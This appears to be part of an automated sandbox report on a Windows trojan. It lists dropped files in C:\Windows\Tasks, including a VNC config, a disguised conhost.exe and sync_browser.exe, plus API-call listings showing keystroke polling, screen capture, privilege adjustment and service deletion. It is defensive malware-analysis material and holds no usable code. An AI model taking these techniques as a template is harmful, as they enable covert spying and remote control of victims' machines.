                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0C3770 GetDC,CreateCompatibleDC,CreateCompatibleBitmap,GetDIBits,GetDIBits,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateDIBSection,CreateCompatibleBitmap,DeleteObject,timeGetTime,SelectObject,BitBlt,SelectObject,timeGetTime,timeGetTime,GetPixel,timeGetTime,ReleaseDC,DeleteDC,DeleteObject,18_2_00007FF6DC0C3770
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC111550 GetAsyncKeyState,MapVirtualKeyA,GetAsyncKeyState,18_2_00007FF6DC111550
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0D74C0 keybd_event,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,TryEnterCriticalSection,LeaveCriticalSection,keybd_event,18_2_00007FF6DC0D74C0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0D74C0 keybd_event,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,TryEnterCriticalSection,LeaveCriticalSection,keybd_event,23_2_00007FF6DC0D74C0
                          Source: C:\Windows\Tasks\sync_browser.exeProcess Stats: CPU usage > 49%
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0D2E40 OpenSCManagerA,OpenServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,Sleep,DeleteService,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,18_2_00007FF6DC0D2E40
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0CD560 GetModuleFileNameA,FindWindowA,GetWindowThreadProcessId,OpenProcess,OpenProcessToken,CreateProcessAsUserA,GetLastError,CloseHandle,CloseHandle,CloseHandle,CloseHandle,18_2_00007FF6DC0CD560
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0D3550 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetVersionExA,ExitWindowsEx,18_2_00007FF6DC0D3550
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0D34B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,18_2_00007FF6DC0D34B0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0D3550 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetVersionExA,ExitWindowsEx,23_2_00007FF6DC0D3550
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0D34B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,23_2_00007FF6DC0D34B0
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\0271695705143540Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\id2rlx.MxYNRdJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\Nfe70s.UFVVkMJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\wFUH4p.aEmodeJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\WPSela.LSZr7VJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\0271695705143540.cmdJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\sync_browser.exeJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\UltraVNC.iniJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\conhost.exeJump to behavior
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeCode function: 0_2_004057210_2_00405721
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeCode function: 0_2_004139D10_2_004139D1
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeCode function: 0_2_00413AAB0_2_00413AAB
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeCode function: 0_2_004133700_2_00413370
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeCode function: 0_2_00413D430_2_00413D43
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeCode function: 0_2_0040AD300_2_0040AD30
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0E36D018_2_00007FF6DC0E36D0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0D859018_2_00007FF6DC0D8590
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0E4D7E18_2_00007FF6DC0E4D7E
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0DC5B018_2_00007FF6DC0DC5B0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0C1DD018_2_00007FF6DC0C1DD0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0E6DD118_2_00007FF6DC0E6DD1
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0D8E1018_2_00007FF6DC0D8E10
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0DE61018_2_00007FF6DC0DE610
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0F3E2018_2_00007FF6DC0F3E20
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0E162018_2_00007FF6DC0E1620
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0E265018_2_00007FF6DC0E2650
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0EAE7018_2_00007FF6DC0EAE70
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0F166018_2_00007FF6DC0F1660
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC11065018_2_00007FF6DC110650
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0C4E8018_2_00007FF6DC0C4E80
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC18068C18_2_00007FF6DC18068C
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0D974018_2_00007FF6DC0D9740
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0C377018_2_00007FF6DC0C3770
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0DAF6018_2_00007FF6DC0DAF60
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0EE78018_2_00007FF6DC0EE780
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC17DF8018_2_00007FF6DC17DF80
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0CC81018_2_00007FF6DC0CC810
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0EA87018_2_00007FF6DC0EA870
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0DA89018_2_00007FF6DC0DA890
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0DC09018_2_00007FF6DC0DC090
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0C188018_2_00007FF6DC0C1880
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0D70B018_2_00007FF6DC0D70B0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0DC8D018_2_00007FF6DC0DC8D0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0D20E018_2_00007FF6DC0D20E0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0CA91018_2_00007FF6DC0CA910
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0D110018_2_00007FF6DC0D1100
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0D693018_2_00007FF6DC0D6930
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0DA13018_2_00007FF6DC0DA130
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0ED15018_2_00007FF6DC0ED150
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0C517018_2_00007FF6DC0C5170
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0EF98018_2_00007FF6DC0EF980
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0D898018_2_00007FF6DC0D8980
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0C81AD18_2_00007FF6DC0C81AD
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0CE1D018_2_00007FF6DC0CE1D0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0E51B718_2_00007FF6DC0E51B7
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC1809F018_2_00007FF6DC1809F0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0C79E918_2_00007FF6DC0C79E9
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0C420018_2_00007FF6DC0C4200
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0E5A3318_2_00007FF6DC0E5A33
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0C7A1C18_2_00007FF6DC0C7A1C
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0E623E18_2_00007FF6DC0E623E
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0C227018_2_00007FF6DC0C2270
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0E8A7018_2_00007FF6DC0E8A70
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0D027018_2_00007FF6DC0D0270
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC17725018_2_00007FF6DC177250
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0C7A5B18_2_00007FF6DC0C7A5B
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0C3A9018_2_00007FF6DC0C3A90
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0C7A9A18_2_00007FF6DC0C7A9A
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0C7ACF18_2_00007FF6DC0C7ACF
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0EC2C018_2_00007FF6DC0EC2C0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC1312C018_2_00007FF6DC1312C0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0EAB1018_2_00007FF6DC0EAB10
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0C7B0418_2_00007FF6DC0C7B04
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0F033018_2_00007FF6DC0F0330
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0C7B3718_2_00007FF6DC0C7B37
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0C7B7118_2_00007FF6DC0C7B71
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0C439018_2_00007FF6DC0C4390
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0D7B9018_2_00007FF6DC0D7B90
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0DBB8018_2_00007FF6DC0DBB80
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0C7BA618_2_00007FF6DC0C7BA6
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0E739B18_2_00007FF6DC0E739B
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0DB3D018_2_00007FF6DC0DB3D0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0E6BBD18_2_00007FF6DC0E6BBD
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0C7BE218_2_00007FF6DC0C7BE2
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0D93E018_2_00007FF6DC0D93E0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0D4C1018_2_00007FF6DC0D4C10
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC17E40018_2_00007FF6DC17E400
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0EA42018_2_00007FF6DC0EA420
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC182C7018_2_00007FF6DC182C70
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0F346018_2_00007FF6DC0F3460
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC188C9018_2_00007FF6DC188C90
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0F54A018_2_00007FF6DC0F54A0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0F5CA018_2_00007FF6DC0F5CA0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0E2CC018_2_00007FF6DC0E2CC0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0EDCF018_2_00007FF6DC0EDCF0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0CDCF018_2_00007FF6DC0CDCF0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0F1CE018_2_00007FF6DC0F1CE0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0D1D1018_2_00007FF6DC0D1D10
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0DAD3018_2_00007FF6DC0DAD30
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0D859023_2_00007FF6DC0D8590
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0E4D7E23_2_00007FF6DC0E4D7E
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0DC5B023_2_00007FF6DC0DC5B0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0C1DD023_2_00007FF6DC0C1DD0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0E6DD123_2_00007FF6DC0E6DD1
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0E2DF323_2_00007FF6DC0E2DF3
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0D8E1023_2_00007FF6DC0D8E10
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0DE61023_2_00007FF6DC0DE610
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0F3E2023_2_00007FF6DC0F3E20
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0E162023_2_00007FF6DC0E1620
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0E265023_2_00007FF6DC0E2650
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0EAE7023_2_00007FF6DC0EAE70
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0F166023_2_00007FF6DC0F1660
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC11065023_2_00007FF6DC110650
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0C4E8023_2_00007FF6DC0C4E80
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC18068C23_2_00007FF6DC18068C
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0E36D023_2_00007FF6DC0E36D0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0D974023_2_00007FF6DC0D9740
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0C377023_2_00007FF6DC0C3770
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0DAF6023_2_00007FF6DC0DAF60
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0EE78023_2_00007FF6DC0EE780
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC17DF8023_2_00007FF6DC17DF80
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0CC81023_2_00007FF6DC0CC810
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0EA87023_2_00007FF6DC0EA870
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0DA89023_2_00007FF6DC0DA890
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0DC09023_2_00007FF6DC0DC090
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0C188023_2_00007FF6DC0C1880
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0D70B023_2_00007FF6DC0D70B0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0DC8D023_2_00007FF6DC0DC8D0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0D20E023_2_00007FF6DC0D20E0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0CA91023_2_00007FF6DC0CA910
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0D110023_2_00007FF6DC0D1100
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0D693023_2_00007FF6DC0D6930
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0DA13023_2_00007FF6DC0DA130
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0ED15023_2_00007FF6DC0ED150
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0C517023_2_00007FF6DC0C5170
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0EF98023_2_00007FF6DC0EF980
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0D898023_2_00007FF6DC0D8980
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0C81AD23_2_00007FF6DC0C81AD
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0CE1D023_2_00007FF6DC0CE1D0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0E51B723_2_00007FF6DC0E51B7
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC1809F023_2_00007FF6DC1809F0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0C79E923_2_00007FF6DC0C79E9
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0C420023_2_00007FF6DC0C4200
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0E5A3323_2_00007FF6DC0E5A33
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0C7A1C23_2_00007FF6DC0C7A1C
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0E623E23_2_00007FF6DC0E623E
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0C227023_2_00007FF6DC0C2270
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0E8A7023_2_00007FF6DC0E8A70
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0D027023_2_00007FF6DC0D0270
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC17725023_2_00007FF6DC177250
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0C7A5B23_2_00007FF6DC0C7A5B
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0C3A9023_2_00007FF6DC0C3A90
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0C7A9A23_2_00007FF6DC0C7A9A
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0C7ACF23_2_00007FF6DC0C7ACF
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0EC2C023_2_00007FF6DC0EC2C0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC1312C023_2_00007FF6DC1312C0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0EAB1023_2_00007FF6DC0EAB10
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0C7B0423_2_00007FF6DC0C7B04
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0F033023_2_00007FF6DC0F0330
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0C7B3723_2_00007FF6DC0C7B37
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0C7B7123_2_00007FF6DC0C7B71
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0C439023_2_00007FF6DC0C4390
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0D7B9023_2_00007FF6DC0D7B90
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0DBB8023_2_00007FF6DC0DBB80
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0C7BA623_2_00007FF6DC0C7BA6
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0E739B23_2_00007FF6DC0E739B
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0DB3D023_2_00007FF6DC0DB3D0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0E6BBD23_2_00007FF6DC0E6BBD
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0C7BE223_2_00007FF6DC0C7BE2
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0D93E023_2_00007FF6DC0D93E0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0D4C1023_2_00007FF6DC0D4C10
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC17E40023_2_00007FF6DC17E400
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0EA42023_2_00007FF6DC0EA420
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC182C7023_2_00007FF6DC182C70
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0F346023_2_00007FF6DC0F3460
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC188C9023_2_00007FF6DC188C90
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0F54A023_2_00007FF6DC0F54A0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0F5CA023_2_00007FF6DC0F5CA0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0EDCF023_2_00007FF6DC0EDCF0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0CDCF023_2_00007FF6DC0CDCF0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0F1CE023_2_00007FF6DC0F1CE0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0D1D1023_2_00007FF6DC0D1D10
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0DAD3023_2_00007FF6DC0DAD30
                          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\WPSela.LSZr7V F7D4080AD8259B0AAC2504F8B5D8FAB18E5124321C442C8BCB577598059D0B24
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: String function: 00007FF6DC12A3B0 appears 38 times
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: String function: 00007FF6DC0CAE30 appears 34 times
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: String function: 00007FF6DC1770B4 appears 56 times
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: String function: 00007FF6DC179500 appears 42 times
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: String function: 00007FF6DC177C50 appears 60 times
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: String function: 00007FF6DC0C3730 appears 730 times
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeCode function: String function: 004026B0 appears 38 times
                          Source: WPSela.LSZr7V.0.drStatic PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
                          Source: WPSela.LSZr7V.0.drStatic PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
                          Source: WPSela.LSZr7V.2.drStatic PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
                          Source: WPSela.LSZr7V.2.drStatic PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
                          Source: sync_browser.exe.6.drStatic PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
                          Source: sync_browser.exe.6.drStatic PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
                          Source: 7q551ugrWe.exe, 00000000.00000003.2107015272.000000000266C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCONHOST.EXEj% vs 7q551ugrWe.exe
                          Source: 7q551ugrWe.exe, 00000000.00000003.2108953574.000000000266B000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWinVNC.exe0 vs 7q551ugrWe.exe
                          Source: 7q551ugrWe.exe, 00000000.00000003.2105276977.0000000002421000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamebrowser.exe( vs 7q551ugrWe.exe
                          Source: 7q551ugrWe.exe, 00000000.00000000.2102902028.000000000041C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamebrowser.exe( vs 7q551ugrWe.exe
                          Source: 7q551ugrWe.exe, 00000000.00000003.2108665384.000000000284F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWinVNC.exe0 vs 7q551ugrWe.exe
                          Source: 7q551ugrWe.exeBinary or memory string: OriginalFilenamebrowser.exe( vs 7q551ugrWe.exe
                          Source: 7q551ugrWe.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: conhost.exe.6.drBinary string: \Device\ConDrv\Serveronecore\windows\core\console\open\src\server\winntcontrol.cpponecore\windows\core\console\open\src\interactivity\base\servicelocator.cppHost Signal Handler Threadonecore\windows\core\console\open\src\interactivity\base\hostsignalinputthread.cpponecore\windows\core\console\open\src\interactivity\win32\uiatextrange.cpponecore\windows\core\console\open\src\interactivity\win32\accessibilitynotifier.cpponecore\windows\core\console\open\src\interactivity\win32\windowmetrics.cpponecore\windows\core\console\open\src\interactivity\win32\systemconfigurationprovider.cpponecore\windows\core\console\open\src\interactivity\win32\window.cpponecore\windows\core\console\open\src\interactivity\win32\windowio.cpponecore\windows\core\console\open\src\interactivity\win32\icon.cpponecore\windows\core\console\open\src\interactivity\win32\windowuiaprovider.cpponecore\windows\core\console\open\src\interactivity\win32\windowproc.cpponecore\windows\core\console\open\src\interactivity\win32\clipboard.cpponecore\windows\core\console\open\src\interactivity\win32\screeninfouiaprovider.cpponecore\windows\core\console\open\src\types\viewport.cpponecore\windows\core\console\open\src\types\convert.cpponecore\windows\core\console\open\src\types\utils.cpp
                          Source: classification engineClassification label: mal92.troj.spyw.evad.winEXE@50/46@2/1
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeCode function: 0_2_00408DBF wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree,0_2_00408DBF
